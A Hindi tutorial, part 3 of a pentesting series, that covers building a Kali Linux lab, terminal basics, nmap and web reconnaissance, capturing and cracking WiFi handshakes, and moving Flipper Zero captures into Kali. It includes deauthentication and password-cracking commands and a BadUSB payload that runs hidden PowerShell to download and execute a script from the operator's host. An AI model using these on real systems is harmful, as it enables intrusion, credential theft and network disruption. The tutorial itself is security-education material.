Kali Linux की बुनियादी बातें: अपनी हैकिंग लैब बनाएं

हैकर का मार्ग: 5 भागों की श्रृंखला

भाग 1: परिचय → भाग 2: Flipper में महारत → भाग 3: Kali की बुनियादी बातें → भाग 4: एक्सप्लॉइटेशन → भाग 5: पूर्ण ऑडिट

भाग 1 और 2 में, आपने कार्ड क्लोन किए, रेडियो फ्रीक्वेंसी का विश्लेषण किया और समझा कि ज़्यादातर "सुरक्षा" सिर्फ दिखावा है। आपने कमज़ोरियों को बाहर से देखा। अब आप अंदर जाकर उन्हें हमलावर की नज़र से देखेंगे।

Kali Linux इंडस्ट्री-स्टैंडर्ड पेनिट्रेशन टेस्टिंग डिस्ट्रीब्यूशन है। यह 600 से ज़्यादा सुरक्षा टूल्स के साथ प्री-लोडेड आता है। यह भारी लग सकता है। ज़्यादातर ट्यूटोरियल आपको गहरे पानी में फेंक देते हैं, ऐसी कमांड्स के साथ जो आप नहीं समझते और बिना किसी संदर्भ के कि वे क्यों मायने रखती हैं।

हम इसे अलग तरीके से कर रहे हैं। इस लेख के अंत तक, आपके पास एक काम करने वाली लैब होगी, आप नेटवर्क रिकॉनसेंस को बुनियादी स्तर पर समझेंगे, और अपना पहला WiFi handshake कैप्चर करेंगे। हर कदम पिछले पर बनता है।

भाग 1: अपनी लैब बनाना

प्रोफेशनल पेनिट्रेशन टेस्टर अपनी मुख्य मशीन पर Kali नहीं चलाते। वे आइसोलेटेड एन्वायरनमेंट का इस्तेमाल करते हैं जिन्हें रीसेट, स्नैपशॉट और नष्ट किया जा सकता है, बिना मुख्य सिस्टम को प्रभावित किए। आप भी ऐसा ही करेंगे।

विकल्प A: वर्चुअल मशीन (सीखने के लिए सुझाई गई)

वर्चुअल मशीन आपको सबसे सुरक्षित सीखने का वातावरण देती है। आप अपनी प्रगति के स्नैपशॉट ले सकते हैं, गलतियाँ कर सकते हैं, और तुरंत वापस जा सकते हैं।

आपको क्या चाहिए

• होस्ट मशीन: 16GB+ RAM, 50GB+ फ्री डिस्क स्पेस, virtualization सपोर्ट वाला मॉडर्न CPU
• वर्चुअलाइज़ेशन सॉफ़्टवेयर: VirtualBox (मुफ़्त) या VMware Workstation Player (व्यक्तिगत उपयोग के लिए मुफ़्त)
• Kali Linux: kali.org से आधिकारिक प्री-बिल्ट VM

प्रोजेक्ट: Kali VM सेटअप

समय: 30-45 मिनट

स्टेप्स:

1. अपने hypervisor (VirtualBox या VMware) के लिए Kali VM इमेज डाउनलोड करें
2. डाउनलोड किए गए आर्काइव को एक्सट्रैक्ट करें (Windows के लिए 7-Zip सुझाया गया)
3. VM को अपने hypervisor में इम्पोर्ट करें
4. रिसोर्सेज़ कॉन्फ़िगर करें: न्यूनतम 4GB RAM (8GB सुझाई), 2+ CPU कोर
5. नेटवर्क एडाप्टर को "Bridged" मोड में इनेबल करें पूर्ण नेटवर्क एक्सेस के लिए
6. VM बूट करें और डिफ़ॉल्ट क्रेडेंशियल्स से लॉगिन करें: kali / kali
7. टर्मिनल खोलें और चलाएँ: sudo apt update && sudo apt full-upgrade -y
8. आसान रिकवरी के लिए "Fresh Install" नाम से एक स्नैपशॉट बनाएँ

सफलता की पुष्टि: आप टर्मिनल खोल सकते हैं, whoami चला सकते हैं, और kali देख सकते हैं।

विकल्प B: डेडिकेटेड हार्डवेयर (गंभीर अभ्यास के लिए)

एक बार जब आप Kali में सहज हो जाएँ, तो डेडिकेटेड हार्डवेयर VM ओवरहेड हटा देता है और पूर्ण हार्डवेयर एक्सेस देता है, जो वायरलेस टेस्टिंग के लिए ज़रूरी है।

हार्डवेयर सिफ़ारिशें

अभी के लिए, VM बिल्कुल सही है। डेडिकेटेड हार्डवेयर तब ज़रूरी हो जाता है जब आपको वायरलेस टेस्टिंग के लिए monitor mode चाहिए (इस लेख में आगे कवर किया गया है)।

विकल्प C: Live USB (ज़ीरो परसिस्टेंस)

Live USB Kali को सीधे बिना इंस्टॉलेशन के चलाता है। पावर ऑफ़ करने पर सब कुछ गायब हो जाता है। अलग हार्डवेयर पर टेस्टिंग के लिए उपयोगी, लेकिन हर सेशन में आपका काम खो जाएगा जब तक आप persistent पार्टीशन न बनाएँ।

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd डेटा नष्ट करता है

dd कमांड बिना किसी पुष्टि के सीधे डिस्क पर लिखती है। डिवाइस नाम तीन बार जाँचें। गलत डिवाइस पर लिखने से वह ड्राइव पूरी तरह वाइप हो जाएगी।

भाग 2: टर्मिनल माइंडसेट

सुरक्षा टूल्स को छूने से पहले, आपको टर्मिनल में सहज होना ज़रूरी है। यह वैकल्पिक नहीं है। GUI Kali में मौजूद है, लेकिन असली काम कमांड लाइन पर होता है।

बुनियादी नेविगेशन

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

प्रिविलेज एस्केलेशन

कई सुरक्षा टूल्स को root एक्सेस चाहिए। Kali में, sudo आपको अस्थायी root प्रिविलेज देता है।

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

ज़िम्मेदारी से Root करें

Root के रूप में चलाने का मतलब है कोई सेफ्टी नेट नहीं। rm -rf / जैसी टाइपो सब कुछ नष्ट कर देगी। मॉडर्न Kali इस खास कमांड को रोकता है, लेकिन सिद्धांत कायम है: जो चला रहे हैं उसे चलाने से पहले समझें।

प्रोसेस मैनेजमेंट

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

नेटवर्क कमांड्स

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

प्रोजेक्ट: टर्मिनल ओरिएंटेशन

समय: 15 मिनट

कार्य:

1. ip a का इस्तेमाल करके लोकल नेटवर्क पर अपना IP एड्रेस खोजें
2. ip route का इस्तेमाल करके अपना डिफ़ॉल्ट गेटवे पहचानें
3. कनेक्टिविटी कन्फ़र्म करने के लिए अपने गेटवे को पिंग करें
4. /etc में सभी फ़ाइलें मॉडिफ़िकेशन टाइम के अनुसार सॉर्ट करें: ls -lt /etc | head
5. /etc/passwd की पहली 50 लाइनें पढ़ें: head -n 50 /etc/passwd

लक्ष्य: आपको बिना सोचे नेविगेट करने, नेटवर्क स्टेटस चेक करने और फ़ाइलें पढ़ने में सक्षम होना चाहिए।

भाग 3: Nmap से नेटवर्क रिकॉनसेंस

Nmap (Network Mapper) सबसे महत्वपूर्ण टूल है जो आप सीखेंगे। यह hosts की खोज करता है, सर्विसेज़ की पहचान करता है, ऑपरेटिंग सिस्टम डिटेक्ट करता है और नेटवर्क टोपोलॉजी मैप करता है। बाकी सब कुछ nmap आउटपुट पर बनता है।

आपकी पहली स्कैन

चलिए अपने नेटवर्क को स्कैन करते हैं। पहले, अपनी नेटवर्क रेंज पहचानें:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255

bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

आपको इस तरह का आउटपुट दिखेगा:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

वह पहली स्कैन आपको बताती है: "मेरे नेटवर्क पर ये डिवाइस मौजूद हैं।" अब गहरे सवाल पूछते हैं।

सर्विस डिटेक्शन

एक बार जब आप जान लें कि कौन से hosts मौजूद हैं, तो आप जानना चाहेंगे कि वे कौन सी सर्विसेज़ चला रहे हैं।

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

सामान्य आउटपुट:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

ऑपरेटिंग सिस्टम डिटेक्शन

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

पोर्ट स्टेट्स को समझना

Nmap पोर्ट्स को कई स्टेट्स में रिपोर्ट करता है:

• open - एप्लिकेशन सक्रिय रूप से कनेक्शन स्वीकार कर रही है। यही है जो हमलावर खोजते हैं।
• closed - पोर्ट एक्सेसिबल है लेकिन कोई एप्लिकेशन नहीं सुन रही। होस्ट चालू है लेकिन वहाँ कुछ नहीं है।
• filtered - फ़ायरवॉल या फ़िल्टर प्रोब को ब्लॉक कर रहा है। ओपन या क्लोज़्ड पता नहीं चल सकता।
• unfiltered - पोर्ट एक्सेसिबल है लेकिन nmap तय नहीं कर पा रहा कि ओपन है या क्लोज़्ड।

स्कैन टाइप्स और स्टेल्थ

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

NSE nmap को वल्नरेबिलिटी डिटेक्शन, सर्विस एन्यूमरेशन और बहुत कुछ के लिए स्पेशलाइज़्ड स्क्रिप्ट्स से विस्तारित करता है।

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

प्रोजेक्ट: अपने नेटवर्क को मैप करें

समय: 30 मिनट

पूर्वापेक्षाएँ: ip a से अपनी नेटवर्क रेंज जानें

1. सभी hosts खोजें: sudo nmap -sn YOUR_NETWORK/24
2. खोजे गए hosts और उनके MAC एड्रेस की सूची बनाएँ
3. अपना राउटर चुनें (आमतौर पर .1) और चलाएँ: sudo nmap -sV -sC YOUR_ROUTER
4. अपने राउटर पर सभी ओपन पोर्ट्स और सर्विसेज़ पहचानें
5. sudo nmap -A YOUR_COMPUTER चलाएँ यह देखने के लिए कि आपकी मशीन क्या एक्सपोज़ करती है

डॉक्यूमेंट करें: एक टेक्स्ट फ़ाइल बनाएँ जिसमें हर डिवाइस, उसका IP, MAC और सर्विसेज़ लिस्ट हों। यह आपका नेटवर्क मैप है।

भाग 4: वेब रिकॉनसेंस

आपकी nmap स्कैन में शायद HTTP सर्विसेज़ (पोर्ट्स 80, 443, 8080) मिली होंगी। चलिए समझते हैं कि वहाँ क्या चल रहा है।

Whatweb: त्वरित सर्विस पहचान

bash# Identify web technologies
whatweb http://192.168.1.1

उदाहरण आउटपुट:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: वेब वल्नरेबिलिटी स्कैनर

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

डायरेक्टरी एन्यूमरेशन: क्या छिपा है?

वेब सर्वर में अक्सर ऐसी डायरेक्टरी होती हैं जो मुख्य पेज से लिंक नहीं होतीं: एडमिन पैनल, कॉन्फ़िग फ़ाइलें, बैकअप फ़ाइलें।

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

सामान्य ख़ोज:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Wordlists का स्थान

Kali /usr/share/wordlists/ में विस्तृत wordlists शामिल करता है। सबसे आम डायरेक्टरी: dirb/, dirbuster/, rockyou.txt (पासवर्ड), और seclists/ (व्यापक कलेक्शन)।

प्रोजेक्ट: अपने राउटर के वेब इंटरफ़ेस का ऑडिट करें

समय: 20 मिनट

1. सर्वर पहचानने के लिए whatweb http://YOUR_ROUTER_IP चलाएँ
2. वल्नरेबिलिटीज़ चेक करने के लिए nikto -h http://YOUR_ROUTER_IP चलाएँ
3. gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt चलाएँ
4. ब्राउज़र में खोजी गई डायरेक्टरी विज़िट करें
5. एडमिन पैनल, वर्शन नंबर या दिलचस्प ख़ोज नोट करें

सामान्य ख़ोज: डिफ़ॉल्ट क्रेडेंशियल्स के साथ एक्सपोज़्ड राउटर एडमिन पेज।

भाग 5: वायरलेस रिकॉनसेंस

यहाँ चीज़ें दिलचस्प होती हैं। WiFi नेटवर्क लगातार ब्रॉडकास्ट करते हैं, और सही टूल्स के साथ, आप ऑथेंटिकेशन handshakes कैप्चर कर सकते हैं: वह एन्क्रिप्टेड एक्सचेंज जो डिवाइस कनेक्ट होने पर होता है।

हार्डवेयर रिक्वायरमेंट्स

आपका बिल्ट-इन WiFi शायद इसके लिए काम नहीं करेगा। आपको ऐसा एडाप्टर चाहिए जो monitor mode और packet injection सपोर्ट करे। सुझाव: Alfa AWUS036ACH ($50) या Alfa AWUS036ACM ($45)। ये Kali के साथ बॉक्स से बाहर काम करते हैं।

Monitor Mode को समझना

सामान्य WiFi मोड ("managed mode") केवल आपके डिवाइस के लिए आने वाले पैकेट प्राप्त करता है। Monitor mode रेंज में सभी पैकेट कैप्चर करता है, चैनल पर हर डिवाइस का ट्रैफ़िक।

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

नेटवर्क स्कैनिंग

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

जो आप देख रहे हैं वह रेंज में हर WiFi नेटवर्क है, उनकी सुरक्षा सेटिंग्स, और अक्सर उनसे जुड़े डिवाइस। यही है जो एक war driver देखता है जब वह मोहल्लों को स्कैन करता है।

Handshake कैप्चर करना

जब कोई डिवाइस WPA2 नेटवर्क से कनेक्ट होता है, तो एक four-way handshake होता है। अगर आप इस handshake को कैप्चर करें, तो आप ऑफ़लाइन पासवर्ड क्रैक करने की कोशिश कर सकते हैं।

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

जब आप handshake कैप्चर करते हैं, तो airodump-ng ऊपरी-दाएँ कोने में [ WPA handshake: XX:XX:XX:XX:XX:XX ] दिखाता है।

Deauth अटैक अवैध हैं

जो नेटवर्क आपके नहीं हैं उनमें deauthentication पैकेट भेजना Computer Fraud and Abuse Act (अमेरिका में) और अन्य जगहों पर समान कानूनों के तहत संघीय अपराध है। केवल अपने नेटवर्क पर टेस्ट करें। मकसद वल्नरेबिलिटी को समझना है, दूसरों पर हमला करना नहीं।

Handshake क्रैक करना

कैप्चर किए गए handshake के साथ, आप wordlist का इस्तेमाल करके ऑफ़लाइन पासवर्ड क्रैक करने की कोशिश कर सकते हैं:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt

पासवर्ड स्ट्रेंथ रियलिटी चेक

rockyou.txt में असली डेटा ब्रीच से 14+ मिलियन पासवर्ड हैं। अगर आपका WiFi पासवर्ड "password123" या "summer2024" या आपके कुत्ते का नाम है, तो यह सेकंडों में क्रैक हो सकता है। 12+ कैरेक्टर का रैंडम पासवर्ड brute-force करने में लाखों साल लगेंगे।

प्रोजेक्ट: अपनी WiFi सुरक्षा टेस्ट करें

समय: 45 मिनट

पूर्वापेक्षाएँ: Monitor mode सपोर्ट वाला एक्सटर्नल WiFi एडाप्टर

1. Monitor mode इनेबल करें: sudo airmon-ng start wlan0
2. नेटवर्क स्कैन करें: sudo airodump-ng wlan0mon
3. अपने नेटवर्क का चैनल और BSSID नोट करें
4. अपने चैनल पर कैप्चर करें: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
5. अपने WiFi पर एक डिवाइस रीकनेक्ट करें (या अपने नेटवर्क पर deauth इस्तेमाल करें)
6. Handshake कैप्चर कन्फ़र्म करें
7. rockyou.txt से टेस्ट करें: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

परिणाम: अगर आपका पासवर्ड मिल गया, तो इसे तुरंत कुछ रैंडम और लंबे (20+ कैरेक्टर) में बदलें।

भाग 6: अपना Flipper Zero कनेक्ट करना

भाग 2 के वे सारे कैप्चर याद हैं? चलिए उन्हें अपनी Kali वर्कफ़्लो में इंटीग्रेट करते हैं।

फ़ाइलें ट्रांसफ़र करना

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

NFC Dumps का विश्लेषण

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Sub-GHz विश्लेषण

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

BadUSB डेवलपमेंट

Kali में BadUSB payloads बनाएँ, Flipper पर टेस्ट करें:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

BadUSB Payloads शक्तिशाली हैं

ये स्क्रिप्ट प्लग इन करते ही ऑटोमैटिक रूप से एक्ज़ीक्यूट होती हैं। एक दुर्भावनापूर्ण payload सेकंडों में backdoors इंस्टॉल कर सकता है, credentials चुरा सकता है या डेटा नष्ट कर सकता है। केवल टेस्टिंग के लिए अपनी मशीनों पर इस्तेमाल करें। अपना Flipper कभी ऐसी जगह न छोड़ें जहाँ कोई और इसे प्लग कर सके।

भाग 7: डॉक्यूमेंटेशन और वर्कफ़्लो

प्रोफेशनल पेनिट्रेशन टेस्टर सिर्फ़ टूल्स नहीं चलाते। वे सब कुछ डॉक्यूमेंट करते हैं। अच्छा डॉक्यूमेंटेशन शौकिया लोगों को प्रोफेशनल्स से अलग करता है।

CherryTree से नोट्स लेना

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Nmap आउटपुट सेव करना

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

सेशन लॉगिंग

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

हैकर का मार्ग

5 भागों की श्रृंखला जो आपको जिज्ञासु से सक्षम बनाती है।

भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियादी बातें ✓ भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट

भाग 3 चेकलिस्ट

☐ लैब सेटअप: Kali VM चल रहा, अपडेटेड, स्नैपशॉट सेव

☐ टर्मिनल: नेविगेशन, परमिशन, प्रोसेस कंट्रोल में सहज

☐ Nmap: नेटवर्क मैप किया, सर्विसेज़ पहचानी, राउटर स्कैन किया

☐ वेब रिकॉन: राउटर वेब इंटरफ़ेस whatweb/nikto से विश्लेषित

☐ वायरलेस: Monitor mode इनेबल, नेटवर्क स्कैन किए

☐ Handshake: अपना WiFi handshake कैप्चर और टेस्ट किया

☐ Flipper: फ़ाइलें ट्रांसफ़र, वर्कफ़्लो समझा

☐ डॉक्यूमेंटेशन: नोट्स व्यवस्थित, स्कैन सेव

आगे क्या है

आपने अपनी लैब बनाई और रिकॉनसेंस फ़ेज़ सीखा। आप hosts खोज सकते हैं, सर्विसेज़ पहचान सकते हैं और वायरलेस handshakes कैप्चर कर सकते हैं। आप समझते हैं कि हमलावर नेटवर्क को देखते समय क्या देखते हैं।

भाग 4 में, हम रिकॉनसेंस से एक्सप्लॉइटेशन की तरफ बढ़ते हैं। आप सीखेंगे:

• Metasploit Framework, एक्सप्लॉइटेशन का स्विस आर्मी नाइफ
• सामान्य वल्नरेबिलिटी एक्सप्लॉइटेशन वर्कफ़्लो
• Post-exploitation तकनीकें: शुरुआती एक्सेस के बाद क्या होता है
• प्रिविलेज एस्केलेशन: सामान्य यूज़र से एडमिनिस्ट्रेटर बनना
• Pivoting: एक कॉम्प्रोमाइज़्ड सिस्टम का इस्तेमाल करके दूसरों पर हमला

रिकॉनसेंस आपको बताता है कि दरवाज़े कहाँ हैं। एक्सप्लॉइटेशन आपको सिखाता है कि उनसे कैसे गुज़रना है।

आपने इलाके का नक्शा बनाया। अब आप उसमें नेविगेट करना सीखते हैं। भाग 4 आपको दर्शक से ऑपरेटर बनाता है।

भाग 4 में मिलते हैं।